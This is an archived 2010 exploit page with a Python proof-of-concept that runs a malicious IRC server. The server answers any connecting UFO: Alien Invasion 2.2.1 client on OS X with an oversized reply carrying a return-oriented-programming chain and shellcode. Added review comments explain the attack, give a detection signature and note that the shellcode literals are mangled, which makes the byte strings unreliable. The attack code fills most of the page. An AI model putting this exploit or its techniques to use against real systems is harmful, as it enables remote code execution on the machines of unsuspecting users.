UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution
Posted on 08 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
==============================================================================
UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard (ROP)
==============================================================================

#!/usr/bin/python
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
# OS X Snow Leopard: d1dn0t
# OS X Leopard: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
#
# NOTE(review): historical (2010) proof-of-concept listing, kept byte-for-byte
# as found on the page. What the script does, as far as the visible code shows:
# it acts as a malicious IRC *server* -- it waits on TCP port 6667 and, when a
# client connects, immediately answers with a single oversized "001" numeric
# reply (528 filler bytes, then a chain of hard-coded return addresses, then a
# payload). The client-side defect is not on this page; from the payload layout
# it is presumably an unchecked copy of the reply into a fixed-size stack
# buffer in the 2.2.1 in-game IRC client -- confirm against the client source.
# Risk/mitigation for defenders: only a client that connects to an attacker-
# controlled server is exposed, so run a fixed build and do not point the
# in-game IRC client at untrusted servers. Every gadget address below is a
# fixed constant for one specific OS X library build; if the library load
# addresses differ (ASLR, a different OS build), the chain does not line up.
# Detection: an IRC numeric 001 reply whose trailing parameter is several
# hundred bytes of repeated filler followed by non-printable bytes is never a
# legitimate welcome message.
# NOTE(review): the escape sequences inside the string literals on this page
# appear to have been mangled during extraction; treat the literal values
# shown here as unreliable -- the listing as printed is not runnable.

import sys, socket, struct

# Fixed addresses for the targeted OS X build (see review note above).
WRITEABLE = 0x8fe66448
STRCPY=0x8fe2db10

# Payload bytes as printed on the page (see review note on mangled literals).
shellcode = ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1"
             "x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06"
             "xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6"
             "x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d"
             "xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c"
             "x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f"
             "x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82"
             "xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee"
             "xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1"
             "x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6"
             "x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32"
             "x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45")

# ==================== Put stack pointer into EAX/EDX ====================
ROP = struct.pack('<I',0x8fe2b3d4)  # POP - RET Instruction - Pops over the writeable value below
ROP += struct.pack('<I',WRITEABLE)  # Required Writeable address here for exploit to work
ROP += struct.pack('<I',0x8fe2fb63)  # pop eax # ret
ROP += struct.pack('<I',WRITEABLE)  # Pop writeable address into eax for instructions below
ROP += struct.pack('<I',0x8fe2fb58)  # push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret

# ==================== Jump Over Parameters below ====================
ROP += struct.pack('<I',0xffff1d6b)  # add esp,byte +0x1c # pop ebp # ret

# ==================== strcpy call ====================
ROP += struct.pack('<I',STRCPY)  # use strcpy to copy shellcode from stack to heap
ROP += struct.pack('<I',0x8fe2dfd1)  # POP - POP - RET over strcpy params
ROP += struct.pack('<I',WRITEABLE)  # Dst Param for strcpy
ROP += 'EEEE'  # Src Param for strcpy
ROP += struct.pack('<I',WRITEABLE)  # Move execution to where we moved our shell
ROP += 'C'*12  # Padding

# ==================== Craft Parameter 2 ====================
# Need to inc EAX or EDX to point to shell code
# Store 0x40 in ECX
ROP += struct.pack('<I',0x8fe2dae4)  # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
ROP += struct.pack('<I',0x8fe2b3d4)  # POP - RET Instruction - Pops over the value below
ROP += struct.pack('<I',0xffffffff)  # Value to store in ecx
ROP += struct.pack('<I',0x8fe0c0c7)  # inc ecx # xor al,0xc9
ROP += struct.pack('<I',0x8fe0c0c7)  # inc ecx # xor al,0xc9
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
# Replace stack pointer back into eax as it was trashed
ROP += struct.pack('<I',0x8fe2c71d)  # mov eax,edx # ret
# Add offset to parameter
ROP += struct.pack('<I',0x8fe2def4)  # add eax,ecx # ret
# Swap over so we can work on fresh copy of saved ESP
ROP += struct.pack('<I',0x8fe0e32d)  # xchg eax,edx
# Double ECX a few more times to point to our nop sled/shell code
ROP += struct.pack('<I',0x8fe0c0c7)  # inc ecx # xor al,0xc9
ROP += struct.pack('<I',0x8fe0c0c7)  # inc ecx # xor al,0xc9
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
ROP += struct.pack('<I',0x8fe24b3c)  # add ecx,ecx # ret
# Add offset to shellcode
ROP += struct.pack('<I',0x8fe2def4)  # add eax,ecx # ret
# Swap back
ROP += struct.pack('<I',0x8fe0e32d)  # xchg eax,edx
# Copy parameter to placeholder
ROP += struct.pack('<I',0x8fe2fb61)  # mov [eax],edx # pop eax # ret
ROP += 'G'*4  # junk

# ==================== Call strcpy function ====================
# Set our Stack pointer back to original value
ROP += struct.pack('<I',0x8fe0e32d)  # xchg eax,edx
ROP += struct.pack('<I',0x8fe2daea)  # sub eax,ecx # ret
# Return execution to our strdup call above
ROP += struct.pack('<I',0x8fe0b1c2)  # xchg eax,ebp # inc ebp # ret
ROP += struct.pack('<I',0x8fe2b6a5)  # dec ebp # ret
ROP += struct.pack('<I',0xffff01f3)  # mov esp,ebp # pop ebp # ret
ROP += 'G'*4  # junk

# ==================== Call Exploit code from heap ====================
# Wire format of the hostile reply (useful as a detection signature):
# "001 :" + 528 repetitions of the filler literal + ROP chain + 10 repetitions
# of the 'x90' literal (the author's comment above calls this a nop sled)
# + payload + line terminator. The literals are reproduced as printed.
sploit = "001 :"
sploit += "x41" * 528
sploit += ROP
sploit += 'x90' * 10
sploit += shellcode
sploit += "x0dx0a"

# NOTE(review): binds every local interface ('' is the wildcard address),
# accepts exactly one connection and sends the reply unconditionally -- it
# never reads what the client sent first, so any client that connects is
# served the payload.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type [control]-c to exit.")
conn, addr = s.accept()
print '[*] Received connection from: ', addr
conn.send(sploit)
conn.close

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>